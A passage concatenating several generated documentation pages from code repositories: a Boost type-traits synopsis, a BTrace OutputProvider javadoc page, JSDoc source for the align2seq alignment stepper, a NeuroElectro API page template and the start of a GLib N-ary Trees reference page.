</h4></div></div></div>
<p>
The following templates describe the general properties of a type.
</p>
<p>
<span class="bold"><strong>Synopsis:</strong></span>
</p>
<pre class="programlisting"><span class="keyword">template</span> <span class="special"><</span><span class="keyword">class</span> <span class="identifier">T</span><span class="special">></span>
<span class="keyword">struct</span> <a class="link" href="../../reference/alignment_of.html" title="alignment_of">alignment_of</a><span class="special">;</span>
<span class="keyword">template</span> <span class="special"><</span><span class="keyword">class</span> <span class="identifier">T</span><span class="special">></span>
<span class="keyword">struct</span> <a class="link" href="../../reference/has_new_operator.html" title="has_new_operator">has_new_operator</a><span class="special">;</span>
<span class="keyword">template</span> <span class="special"><</span><span class="keyword">class</span> <span class="identifier">T</span><span class="special">></span>
<span class="keyword">struct</span> <a class="link" href="../../reference/has_nothrow_assign.html" title="has_nothrow_assign">has_nothrow_assign</a><span class="special">;</span>
<span class="keyword">template</span> <span class="special"><</span><span class="keyword">class</span> <span class="identifier">T</span><span class="special">></span>
<span class="keyword">struct</span> <a class="link" href="../../reference/has_nothrow_constructor.html" title="has_nothrow_constructor">has_nothrow_constructor</a><span class="special">;</span>
<span class="keyword">template</span> <span class="special"><</span><span class="keyword">class</span> <span class="identifier">T</span><span class="special">></span>
<span class="keyword">struct</span> <a class="link" href="../../reference/has_nothrow_constructor.html" title="has_nothrow_constructor">has_nothrow_default_constructor</a><span class="special">;</span>
<span class="keyword">template</span> <span class="special"><</span><span class="keyword">class</span> <span class="identifier">T</span><span class="special">></span>
<span class="keyword">struct</span> <a class="link" href="../../reference/has_nothrow_copy.html" title="has_nothrow_copy">has_nothrow_copy</a><span class="special">;</span>
<span class="keyword">template</span> <span class="special"><</span><span class="keyword">class</span> <span class="identifier">T</span><span class="special">></span>
<span class="keyword">struct</span> <a class="link" href="../../reference/has_nothrow_copy.html" title="has_nothrow_copy">has_nothrow_copy_constructor</a><span class="special">;</span>
<span class="keyword">template</span> <span class="special"><</span><span class="keyword">class</span> <span class="identifier">T</span><span class="special">></span>
<span class="keyword">struct</span> <a class="link" href="../../reference/has_trivial_assign.html" title="has_trivial_assign">has_trivial_assign</a><span class="special">;</span>
<span class="keyword">template</span> <span class="special"><</span><span class="keyword">class</span> <span class="identifier">T</span><span class="special">></span>
<span class="keyword">struct</span> <a class="link" href="../../reference/has_trivial_constructor.html" title="has_trivial_constructor">has_trivial_constructor</a><span class="special">;</span>
<span class="keyword">template</span> <span class="special"><</span><span class="keyword">class</span> <span class="identifier">T</span><span class="special">></span>
<span class="keyword">struct</span> <a class="link" href="../../reference/has_trivial_constructor.html" title="has_trivial_constructor">has_trivial_default_constructor</a><span class="special">;</span>
<span class="keyword">template</span> <span class="special"><</span><span class="keyword">class</span> <span class="identifier">T</span><span class="special">></span>
<span class="keyword">struct</span> <a class="link" href="../../reference/has_trivial_copy.html" title="has_trivial_copy">has_trivial_copy</a><span class="special">;</span>
<span class="keyword">template</span> <span class="special"><</span><span class="keyword">class</span> <span class="identifier">T</span><span class="special">></span>
<span class="keyword">struct</span> <a class="link" href="../../reference/has_trivial_copy.html" title="has_trivial_copy">has_trivial_copy_constructor</a><span class="special">;</span>
<span class="keyword">template</span> <span class="special"><</span><span class="keyword">class</span> <span class="identifier">T</span><span class="special">></span>
<span class="keyword">struct</span> <a class="link" href="../../reference/has_trivial_destructor.html" title="has_trivial_destructor">has_trivial_destructor</a><span class="special">;</span>
<span class="keyword">template</span> <span class="special"><</span><span class="keyword">class</span> <span class="identifier">T</span><span class="special">></span>
<span class="keyword">struct</span> <a class="link" href="../../reference/has_virtual_destructor.html" title="has_virtual_destructor">has_virtual_destructor</a><span class="special">;</span>
<span class="keyword">template</span> <span class="special"><</span><span class="keyword">class</span> <span class="identifier">T</span><span class="special">></span>
<span class="keyword">struct</span> <a class="link" href="../../reference/is_abstract.html" title="is_abstract">is_abstract</a><span class="special">;</span>
<span class="keyword">template</span> <span class="special"><</span><span class="keyword">class</span> <span class="identifier">T</span><span class="special">></span>
<span class="keyword">struct</span> <a class="link" href="../../reference/is_const.html" title="is_const">is_const</a><span class="special">;</span>
<span class="keyword">template</span> <span class="special"><</span><span class="keyword">class</span> <span class="identifier">T</span><span class="special">></span>
<span class="keyword">struct</span> <a class="link" href="../../reference/is_empty.html" title="is_empty">is_empty</a><span class="special">;</span>
<span class="keyword">template</span> <span class="special"><</span><span class="keyword">class</span> <span class="identifier">T</span><span class="special">></span>
<span class="keyword">struct</span> <a class="link" href="../../reference/is_stateless.html" title="is_stateless">is_stateless</a><span class="special">;</span>
<span class="keyword">template</span> <span class="special"><</span><span class="keyword">class</span> <span class="identifier">T</span><span class="special">></span>
<span class="keyword">struct</span> <a class="link" href="../../reference/is_pod.html" title="is_pod">is_pod</a><span class="special">;</span>
<span class="keyword">template</span> <span class="special"><</span><span class="keyword">class</span> <span class="identifier">T</span><span class="special">></span>
<span class="keyword">struct</span> <a class="link" href="../../reference/is_polymorphic.html" title="is_polymorphic">is_polymorphic</a><span class="special">;</span>
<span class="keyword">template</span> <span class="special"><</span><span class="keyword">class</span> <span class="identifier">T</span><span class="special">></span>
<span class="keyword">struct</span> <a class="link" href="../../reference/is_signed.html" title="is_signed">is_signed</a><span class="special">;</span>
<span class="keyword">template</span> <span class="special"><</span><span class="keyword">class</span> <span class="identifier">T</span><span class="special">></span>
<span class="keyword">struct</span> <a class="link" href="../../reference/is_unsigned.html" title="is_unsigned">is_unsigned</a><span class="special">;</span>
<span class="keyword">template</span> <span class="special"><</span><span class="keyword">class</span> <span class="identifier">T</span><span class="special">></span>
<span class="keyword">struct</span> <a class="link" href="../../reference/is_volatile.html" title="is_volatile">is_volatile</a><span class="special">;</span>
<span class="keyword">template</span> <span class="special"><</span><span class="keyword">class</span> <span class="identifier">T</span><span class="special">,</span> <span class="identifier">std</span><span class="special">::</span><span class="identifier">size_t</span> <span class="identifier">N</span> <span class="special">=</span> <span class="number">0</span><span class="special">></span>
<span class="keyword">struct</span> <a class="link" href="../../reference/extent.html" title="extent">extent</a><span class="special">;</span>
<span class="keyword">template</span> <span class="special"><</span><span class="keyword">class</span> <span class="identifier">T</span><span class="special">></span>
<span class="keyword">struct</span> <a class="link" href="../../reference/rank.html" title="rank">rank</a><span class="special">;</span>
</pre>
</div>
<table xmlns:rev="http://www.cs.rpi.edu/~gregod/boost/tools/doc/revision" width="100%"><tr>
<td align="left"></td>
<td align="right"><div class="copyright-footer">Copyright © 2000, 2006 Adobe Systems Inc, David Abrahams,
Steve Cleary, Beman Dawes, Aleksey Gurtovoy, Howard Hinnant, Jesse Jones, Mat
Marcus, Itay Maman, John Maddock, Alexander Nasonov, Thorsten Ottosen, Robert
Ramey and Jeremy Siek<p>
Distributed under the Boost Software License, Version 1.0. (See accompanying
file LICENSE_1_0.txt or copy at <a href="http://www.boost.org/LICENSE_1_0.txt" target="_top">http://www.boost.org/LICENSE_1_0.txt</a>)
</p>
</div></td>
</tr></table>
<hr>
<div class="spirit-nav">
<a accesskey="p" href="primary.html"><img src="../../../../../../../doc/src/images/prev.png" alt="Prev"></a><a accesskey="u" href="../value_traits.html"><img src="../../../../../../../doc/src/images/up.png" alt="Up"></a><a accesskey="h" href="../../../index.html"><img src="../../../../../../../doc/src/images/home.png" alt="Home"></a><a accesskey="n" href="relate.html"><img src="../../../../../../../doc/src/images/next.png" alt="Next"></a>
</div>
</body>
</html>
|
docs/javadoc/com/sun/btrace/spi/OutputProvider.html
|
xxzmxx/btrace_extend
|
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--NewPage-->
<HTML>
<HEAD>
<!-- Generated by javadoc (build 1.6.0_23) on Tue Oct 18 12:39:05 CEST 2011 -->
<TITLE>
OutputProvider
</TITLE>
<META NAME="date" CONTENT="2011-10-18">
<LINK REL ="stylesheet" TYPE="text/css" HREF="../../../../stylesheet.css" TITLE="Style">
<SCRIPT type="text/javascript">
function windowTitle()
{
if (location.href.indexOf('is-external=true') == -1) {
parent.document.title="OutputProvider";
}
}
</SCRIPT>
<NOSCRIPT>
</NOSCRIPT>
</HEAD>
<BODY BGCOLOR="white" onload="windowTitle();">
<HR>
<!-- ========= START OF TOP NAVBAR ======= -->
<A NAME="navbar_top"><!-- --></A>
<A HREF="#skip-navbar_top" title="Skip navigation links"></A>
<TABLE BORDER="0" WIDTH="100%" CELLPADDING="1" CELLSPACING="0" SUMMARY="">
<TR>
<TD COLSPAN=2 BGCOLOR="#EEEEFF" CLASS="NavBarCell1">
<A NAME="navbar_top_firstrow"><!-- --></A>
<TABLE BORDER="0" CELLPADDING="0" CELLSPACING="3" SUMMARY="">
<TR ALIGN="center" VALIGN="top">
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../overview-summary.html"><FONT CLASS="NavBarFont1"><B>Overview</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="package-summary.html"><FONT CLASS="NavBarFont1"><B>Package</B></FONT></A> </TD>
<TD BGCOLOR="#FFFFFF" CLASS="NavBarCell1Rev"> <FONT CLASS="NavBarFont1Rev"><B>Class</B></FONT> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="package-tree.html"><FONT CLASS="NavBarFont1"><B>Tree</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../deprecated-list.html"><FONT CLASS="NavBarFont1"><B>Deprecated</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../index-all.html"><FONT CLASS="NavBarFont1"><B>Index</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../help-doc.html"><FONT CLASS="NavBarFont1"><B>Help</B></FONT></A> </TD>
</TR>
</TABLE>
</TD>
<TD ALIGN="right" VALIGN="top" ROWSPAN=3><EM>
</EM>
</TD>
</TR>
<TR>
<TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2">
<A HREF="../../../../com/sun/btrace/spi/ClasspathProvider.html" title="interface in com.sun.btrace.spi"><B>PREV CLASS</B></A>
<A HREF="../../../../com/sun/btrace/spi/PortLocator.html" title="interface in com.sun.btrace.spi"><B>NEXT CLASS</B></A></FONT></TD>
<TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2">
<A HREF="../../../../index.html?com/sun/btrace/spi/OutputProvider.html" target="_top"><B>FRAMES</B></A>
<A HREF="OutputProvider.html" target="_top"><B>NO FRAMES</B></A>
<SCRIPT type="text/javascript">
<!--
if(window==top) {
document.writeln('<A HREF="../../../../allclasses-noframe.html"><B>All Classes</B></A>');
}
//-->
</SCRIPT>
<NOSCRIPT>
<A HREF="../../../../allclasses-noframe.html"><B>All Classes</B></A>
</NOSCRIPT>
</FONT></TD>
</TR>
<TR>
<TD VALIGN="top" CLASS="NavBarCell3"><FONT SIZE="-2">
SUMMARY: NESTED | <A HREF="#field_summary">FIELD</A> | CONSTR | <A HREF="#method_summary">METHOD</A></FONT></TD>
<TD VALIGN="top" CLASS="NavBarCell3"><FONT SIZE="-2">
DETAIL: <A HREF="#field_detail">FIELD</A> | CONSTR | <A HREF="#method_detail">METHOD</A></FONT></TD>
</TR>
</TABLE>
<A NAME="skip-navbar_top"></A>
<!-- ========= END OF TOP NAVBAR ========= -->
<HR>
<!-- ======== START OF CLASS DATA ======== -->
<H2>
<FONT SIZE="-1">
com.sun.btrace.spi</FONT>
<BR>
Interface OutputProvider</H2>
<HR>
<DL>
<DT><PRE>public interface <B>OutputProvider</B></DL>
</PRE>
<P>
<DL>
<DT><B>Author:</B></DT>
<DD>Jaroslav Bachorik <yardus@netbeans.org></DD>
</DL>
<HR>
<P>
<!-- =========== FIELD SUMMARY =========== -->
<A NAME="field_summary"><!-- --></A>
<TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY="">
<TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor">
<TH ALIGN="left" COLSPAN="2"><FONT SIZE="+2">
<B>Field Summary</B></FONT></TH>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE>static <A HREF="../../../../com/sun/btrace/spi/OutputProvider.html" title="interface in com.sun.btrace.spi">OutputProvider</A></CODE></FONT></TD>
<TD><CODE><B><A HREF="../../../../com/sun/btrace/spi/OutputProvider.html#DEFAULT">DEFAULT</A></B></CODE>
<BR>
</TD>
</TR>
</TABLE>
<!-- ========== METHOD SUMMARY =========== -->
<A NAME="method_summary"><!-- --></A>
<TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY="">
<TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor">
<TH ALIGN="left" COLSPAN="2"><FONT SIZE="+2">
<B>Method Summary</B></FONT></TH>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE> java.io.PrintWriter</CODE></FONT></TD>
<TD><CODE><B><A HREF="../../../../com/sun/btrace/spi/OutputProvider.html#getStdErr(com.sun.btrace.api.BTraceTask)">getStdErr</A></B>(<A HREF="../../../../com/sun/btrace/api/BTraceTask.html" title="class in com.sun.btrace.api">BTraceTask</A> task)</CODE>
<BR>
</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE> java.io.PrintWriter</CODE></FONT></TD>
<TD><CODE><B><A HREF="../../../../com/sun/btrace/spi/OutputProvider.html#getStdOut(com.sun.btrace.api.BTraceTask)">getStdOut</A></B>(<A HREF="../../../../com/sun/btrace/api/BTraceTask.html" title="class in com.sun.btrace.api">BTraceTask</A> task)</CODE>
<BR>
</TD>
</TR>
</TABLE>
<P>
<!-- ============ FIELD DETAIL =========== -->
<A NAME="field_detail"><!-- --></A>
<TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY="">
<TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor">
<TH ALIGN="left" COLSPAN="1"><FONT SIZE="+2">
<B>Field Detail</B></FONT></TH>
</TR>
</TABLE>
<A NAME="DEFAULT"><!-- --></A><H3>
DEFAULT</H3>
<PRE>
static final <A HREF="../../../../com/sun/btrace/spi/OutputProvider.html" title="interface in com.sun.btrace.spi">OutputProvider</A> <B>DEFAULT</B></PRE>
<DL>
<DL>
</DL>
</DL>
<!-- ============ METHOD DETAIL ========== -->
<A NAME="method_detail"><!-- --></A>
<TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY="">
<TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor">
<TH ALIGN="left" COLSPAN="1"><FONT SIZE="+2">
<B>Method Detail</B></FONT></TH>
</TR>
</TABLE>
<A NAME="getStdOut(com.sun.btrace.api.BTraceTask)"><!-- --></A><H3>
getStdOut</H3>
<PRE>
java.io.PrintWriter <B>getStdOut</B>(<A HREF="../../../../com/sun/btrace/api/BTraceTask.html" title="class in com.sun.btrace.api">BTraceTask</A> task)</PRE>
<DL>
<DD><DL>
</DL>
</DD>
</DL>
<HR>
<A NAME="getStdErr(com.sun.btrace.api.BTraceTask)"><!-- --></A><H3>
getStdErr</H3>
<PRE>
java.io.PrintWriter <B>getStdErr</B>(<A HREF="../../../../com/sun/btrace/api/BTraceTask.html" title="class in com.sun.btrace.api">BTraceTask</A> task)</PRE>
<DL>
<DD><DL>
</DL>
</DD>
</DL>
<!-- ========= END OF CLASS DATA ========= -->
<HR>
<!-- ======= START OF BOTTOM NAVBAR ====== -->
<A NAME="navbar_bottom"><!-- --></A>
<A HREF="#skip-navbar_bottom" title="Skip navigation links"></A>
<TABLE BORDER="0" WIDTH="100%" CELLPADDING="1" CELLSPACING="0" SUMMARY="">
<TR>
<TD COLSPAN=2 BGCOLOR="#EEEEFF" CLASS="NavBarCell1">
<A NAME="navbar_bottom_firstrow"><!-- --></A>
<TABLE BORDER="0" CELLPADDING="0" CELLSPACING="3" SUMMARY="">
<TR ALIGN="center" VALIGN="top">
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../overview-summary.html"><FONT CLASS="NavBarFont1"><B>Overview</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="package-summary.html"><FONT CLASS="NavBarFont1"><B>Package</B></FONT></A> </TD>
<TD BGCOLOR="#FFFFFF" CLASS="NavBarCell1Rev"> <FONT CLASS="NavBarFont1Rev"><B>Class</B></FONT> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="package-tree.html"><FONT CLASS="NavBarFont1"><B>Tree</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../deprecated-list.html"><FONT CLASS="NavBarFont1"><B>Deprecated</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../index-all.html"><FONT CLASS="NavBarFont1"><B>Index</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../help-doc.html"><FONT CLASS="NavBarFont1"><B>Help</B></FONT></A> </TD>
</TR>
</TABLE>
</TD>
<TD ALIGN="right" VALIGN="top" ROWSPAN=3><EM>
</EM>
</TD>
</TR>
<TR>
<TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2">
<A HREF="../../../../com/sun/btrace/spi/ClasspathProvider.html" title="interface in com.sun.btrace.spi"><B>PREV CLASS</B></A>
<A HREF="../../../../com/sun/btrace/spi/PortLocator.html" title="interface in com.sun.btrace.spi"><B>NEXT CLASS</B></A></FONT></TD>
<TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2">
<A HREF="../../../../index.html?com/sun/btrace/spi/OutputProvider.html" target="_top"><B>FRAMES</B></A>
<A HREF="OutputProvider.html" target="_top"><B>NO FRAMES</B></A>
<SCRIPT type="text/javascript">
<!--
if(window==top) {
document.writeln('<A HREF="../../../../allclasses-noframe.html"><B>All Classes</B></A>');
}
//-->
</SCRIPT>
<NOSCRIPT>
<A HREF="../../../../allclasses-noframe.html"><B>All Classes</B></A>
</NOSCRIPT>
</FONT></TD>
</TR>
<TR>
<TD VALIGN="top" CLASS="NavBarCell3"><FONT SIZE="-2">
SUMMARY: NESTED | <A HREF="#field_summary">FIELD</A> | CONSTR | <A HREF="#method_summary">METHOD</A></FONT></TD>
<TD VALIGN="top" CLASS="NavBarCell3"><FONT SIZE="-2">
DETAIL: <A HREF="#field_detail">FIELD</A> | CONSTR | <A HREF="#method_detail">METHOD</A></FONT></TD>
</TR>
</TABLE>
<A NAME="skip-navbar_bottom"></A>
<!-- ======== END OF BOTTOM NAVBAR ======= -->
<HR>
</BODY>
</HTML>
|
doc/timelapse.js.html
|
crazybiocomputing/align2seq
|
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>JSDoc: Source: timelapse.js</title>
<script src="scripts/prettify/prettify.js"> </script>
<script src="scripts/prettify/lang-css.js"> </script>
<!--[if lt IE 9]>
<script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->
<link type="text/css" rel="stylesheet" href="styles/prettify-tomorrow.css">
<link type="text/css" rel="stylesheet" href="styles/jsdoc-default.css">
</head>
<body>
<div id="main">
<h1 class="page-title">Source: timelapse.js</h1>
<section>
<article>
<pre class="prettyprint source linenums"><code>/*
* align2seq: Pairwise alignements algorithms in JavaScript, html5, and css3
* Copyright (C) 2015
*
* This file is part of align2seq.
*
* align2seq is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* align2seq is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with align2seq. If not, see <http://www.gnu.org/licenses/>
*
* Authors:
* Rudy Anne
* Aurelien Beliard
* Emeline Duquenne
* Aurore Perdriau
*/
"use strict"
var nbValuesToDisplay = 0;
var nbValuesAlignToDisplay = 0;
var nbAlign;
var title;
/**
*[First function executed after data treatment in case of step by step]
*
*/
function next(){
nbValuesToDisplay++;
//Limit check value
if(nbValuesToDisplay>=matscore.length){
nbValuesToDisplay=matscore.length;
nbValuesAlignToDisplay++;
if (nbValuesAlignToDisplay>=listalign.length){
nbValuesAlignToDisplay=listalign.length;
}
}
launch_nstep(nbValuesToDisplay);
launch_nstep_align(nbValuesAlignToDisplay);
}
/**
* [this function allow to return to the previous step of the step by step]
* */
function prev(){
nbValuesAlignToDisplay--;
if(nbValuesAlignToDisplay<0){
nbValuesAlignToDisplay=0
nbValuesToDisplay--;
}
launch_nstep(nbValuesToDisplay);
launch_nstep_align(nbValuesAlignToDisplay);
}
/**
* [this function allow to return to the next state]
*
*/
function fastnext(){
if(nbValuesToDisplay<=matscore.length){
nbValuesToDisplay=matscore.length
}
if (nbValuesAlignToDisplay<=listalign.length && nbValuesAlignToDisplay!==0){
nbValuesAlignToDisplay=listalign.length;
}
launch_nstep(nbValuesToDisplay);
launch_nstep_align(nbValuesAlignToDisplay);
nbValuesAlignToDisplay++
}
/**
* [this function allow to return to the previous state]
*/
function fastpreview(){
if (nbValuesAlignToDisplay!==0){
nbValuesAlignToDisplay=0
nbValuesToDisplay=matscore.length;
}
else if (nbValuesToDisplay<=matscore.length){
nbValuesAlignToDisplay=0
nbValuesToDisplay=0
}
launch_nstep(nbValuesToDisplay);
launch_nstep_align(nbValuesAlignToDisplay);
}
/** Step by step function with next and preview possibilities
@param {[number]} nbValuesToDisplay - counter for the scoring matrix
*/
function launch_nstep(nbValuesToDisplay){
var matrixs=document.getElementById("matrixtime");
//The table is empty
while (matrixs.firstChild) {
matrixs.removeChild(matrixs.firstChild);
}
// Filling the array with the desired number of cells
for (var i =0;i<=(size2-1);i++){
matrixs.insertRow(i);
for(var j=0;j<=(size1);j++){
matrixs.rows[i].insertCell(j);
}
}
for(var i=0;i<matrixs.rows.length;i++){
var currentRow = matrixs.rows[i];
for(var j=0;j<currentRow.cells.length;j++){
var currentCell=currentRow.cells[j];
//Filling the array with the first sequence (first column)
if (i>=2 && j===0){
currentCell.innerHTML=s2[i-2];
}
//Filling the array with the second sequence (first ligne)
if (i===0 && j>=2){
currentCell.innerHTML=s1[j-2];
}
}
}
var nbDisplayedValues= 0;
for(var i=1;i<matrixs.rows.length;i++){
var currentRow = matrixs.rows[i];
for(var j=1;j<currentRow.cells.length;j++){
var currentCell=currentRow.cells[j];
if ((nbDisplayedValues>=1) && (nbDisplayedValues<nbValuesToDisplay)){
var i2,j2;
if (j==1){
i2=i-1;
j2=(currentRow.cells.length)-1
}
else{
i2=i;
j2=j-1;
}
var previousCell=matrixs.rows[i2].cells[j2]
var cellprevious=nbDisplayedValues-1;
previousCell.innerHTML=matpatharrows[cellprevious];
previousCell.innerHTML+=matsumtot[cellprevious];
}
//The table is filled with the assumption that it is filled from left to right
currentCell.innerHTML=matscore[nbDisplayedValues];
nbDisplayedValues++;
if (nbDisplayedValues>nbValuesToDisplay) {
currentCell.style.visibility="hidden";
}
if (nbDisplayedValues==matscore.length){
currentCell.innerHTML=matpatharrows[(matscore.length)-1]+" "+matsumtot[(matscore.length)-1];
}
}
}
title=document.getElementById("matrixtime").createCaption();
title.innerHTML="<b>Sum matrix</b>";
if(nbValuesToDisplay>size1) {
if ((nbValuesToDisplay-1)%size1!==0){
var cellvert=size1;
var celldia=size1+1;
var cellcurrent=nbValuesToDisplay-1;
var posj=(nbValuesToDisplay-1)%(len1+1);
var posi=Math.floor((nbValuesToDisplay-1)/(len1+1));
explain.innerHTML="Value of M("+posi+","+posj+") = maximal value between : <br>";
explain.innerHTML+="M("+(posi-1)+","+(posj-1)+") + S("+posi+","+posj+") = "+matsumtot[cellcurrent-celldia]+" + "+matscore[cellcurrent]+" = " +"<b>"+matsumdia[cellcurrent]+"</b>"+"<br>";
explain.innerHTML+="M("+(posi)+","+(posj-1)+") + gap = "+matsumtot[cellcurrent-1]+"+"+gap2[posi]+" = "+"<b>"+matsumhor[cellcurrent]+"</b>"+"<br>";
explain.innerHTML+="M("+(posi-1)+","+(posj)+") + gap = "+matsumtot[cellcurrent-cellvert]+"+"+gap[posj]+"= "+"<b>"+matsumvert[cellcurrent]+"</b>"+"<br>";
explain.innerHTML+="Maximum value of the three : <b>"+matsumtot[cellcurrent]+"</b><br>";
explain.innerHTML+="Corresponding path : "+matpatharrows[cellcurrent]+"<br>";
}
else{
explain.innerHTML="";
}
}
}
/**
* display the alignment step by step
* @param {integer} nbValuesToDisplayAlign number of value in the alignment
*
*/
function launch_nstep_align(nbValuesToDisplayAlign){
if (nbValuesAlignToDisplay>=1){
title.innerHTML="<b>Alignment matrix</b>";
explain.innerHTML=" ";
}
var matrixs=document.getElementById("matrixtime")
var nbDisplayedValuesAlign= 0;
for(var i=1;i<matrixs.rows.length;i++){
var currentRow = matrixs.rows[i];
for(var j=1;j<currentRow.cells.length;j++){
var currentCell=currentRow.cells[j];
}
}
for(var posalign=1;posalign<=nbValuesToDisplayAlign;posalign++){
var alignpos=listalign[posalign-1];
console.log(alignpos);
if (alignpos >= listalign[posalign-2]){
launch_nstep(matscore.length)
}
var posj=(alignpos%(len1+1)-1)+2;
var posi=Math.floor((alignpos/(len1+1)-1)+2);
var alignCell=matrixs.rows[posi].cells[posj];
alignCell.innerHTML=matpatharrowsalign[alignpos];
}
}</code></pre>
</article>
</section>
</div>
<nav>
<h2><a href="index.html">Home</a></h2><h3>Global</h3><ul><li><a href="global.html#fastnext">fastnext</a></li><li><a href="global.html#fastpreview">fastpreview</a></li><li><a href="global.html#launch_nstep">launch_nstep</a></li><li><a href="global.html#launch_nstep_align">launch_nstep_align</a></li><li><a href="global.html#next">next</a></li><li><a href="global.html#prev">prev</a></li></ul>
</nav>
<br class="clear">
<footer>
Documentation generated by <a href="https://github.com/jsdoc3/jsdoc">JSDoc 3.3.0-beta3</a> on Sat May 09 2015 10:51:42 GMT+0200 (CEST)
</footer>
<script> prettyPrint(); </script>
<script src="scripts/linenumber.js"> </script>
</body>
</html>
|
html_templates/neuroelectro/api_docs.html
|
lessc0de/neuroelectro_org
|
{% extends "neuroelectro/base.html" %}
{% block title %}NeuroElectro :: API{% endblock %}
{% block headerIncludes %}
<style type="text/css">
h4 {
margin-left:20px;
}
li {
margin-top:5px;
margin-left:30px;
}
#api_list, #mailing_list_info{
padding-left:25px;
width:800px;
position:relative;
}
</style>
{% endblock %}
{% block content %}
<h1>Data Download and Application Programmer's Interface (API)</h1>
<ol id="api_list">
<lh>We provide access to NeuroElectro data in two forms:</lh>
<li>As a simple bulk download of the neurophysiological database content represented in Excel spreadsheets (~100Kb total).
We expect that this will be sufficient for the majority of uses for the NeuroElectro data. <a href='{{ STATIC_URL }}src/neuroelectro_data_download.zip'>Download Link</a></li>
<li>Through a RESTful API, allowing live, web-based dynamic query of the database's content. <a href='https://docs.google.com/document/d/1eeWTrr1sKDoqXJtPayBgKR9WvPwzdaXDdfat2Y_nZmY/edit?usp=sharing' target="_blank">RESTful API Documentation.</a></li>
</ol>
<p id="mailing_list_info">
If you have questions using the NeuroElectro data or accessing data from the API, please submit your question to the <a href="https://groups.google.com/forum/#!forum/neuroelectro" target="_blank">NeuroElectro Google Groups mailing list.</a>
</br> </br>
Please view the <a href="/publications">Publications Page</a> for guidelines on how to cite data obtained from this resource.
</p>
{% endblock %}
|
src/public/win32-dev/glib-dev-2.12.7/share/gtk-doc/html/glib/glib-N-ary-Trees.html
|
gabrieldelsaint/uol-messenger
|
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=US-ASCII">
<title>N-ary Trees</title>
<meta name="generator" content="DocBook XSL Stylesheets V1.69.1">
<link rel="start" href="index.html" title="GLib Reference Manual">
<link rel="up" href="glib-data-types.html" title="GLib Data Types">
<link rel="prev" href="glib-Balanced-Binary-Trees.html" title="Balanced Binary Trees">
<link rel="next" href="glib-Quarks.html" title="Quarks">
<meta name="generator" content="GTK-Doc V1.7 (XML mode)">
<link rel="stylesheet" href="style.css" type="text/css">
<link rel="chapter" href="glib.html" title="GLib Overview">
<link rel="chapter" href="glib-fundamentals.html" title="GLib Fundamentals">
<link rel="chapter" href="glib-core.html" title="GLib Core Application Support">
<link rel="chapter" href="glib-utilities.html" title="GLib Utilities">
<link rel="chapter" href="glib-data-types.html" title="GLib Data Types">
<link rel="chapter" href="tools.html" title="GLib Tools">
<link rel="index" href="ix01.html" title="Index">
<link rel="index" href="ix02.html" title="Index of deprecated symbols">
<link rel="index" href="ix03.html" title="Index of new symbols in 2.2">
<link rel="index" href="ix04.html" title="Index of new symbols in 2.4">
<link rel="index" href="ix05.html" title="Index of new symbols in 2.6">
<link rel="index" href="ix06.html" title="Index of new symbols in 2.8">
<link rel="index" href="ix07.html" title="Index of new symbols in 2.10">
<link rel="index" href="ix08.html" title="Index of new symbols in 2.12">
</head>
<body bgcolor="white" text="black" link="#0000FF" vlink="#840084" alink="#0000FF">
<table class="navigation" id="top" width="100%" summary="Navigation header" cellpadding="2" cellspacing="2">
<tr valign="middle">
<td><a accesskey="p" href="glib-Balanced-Binary-Trees.html"><img src="left.png" width="24" height="24" border="0" alt="Prev"></a></td>
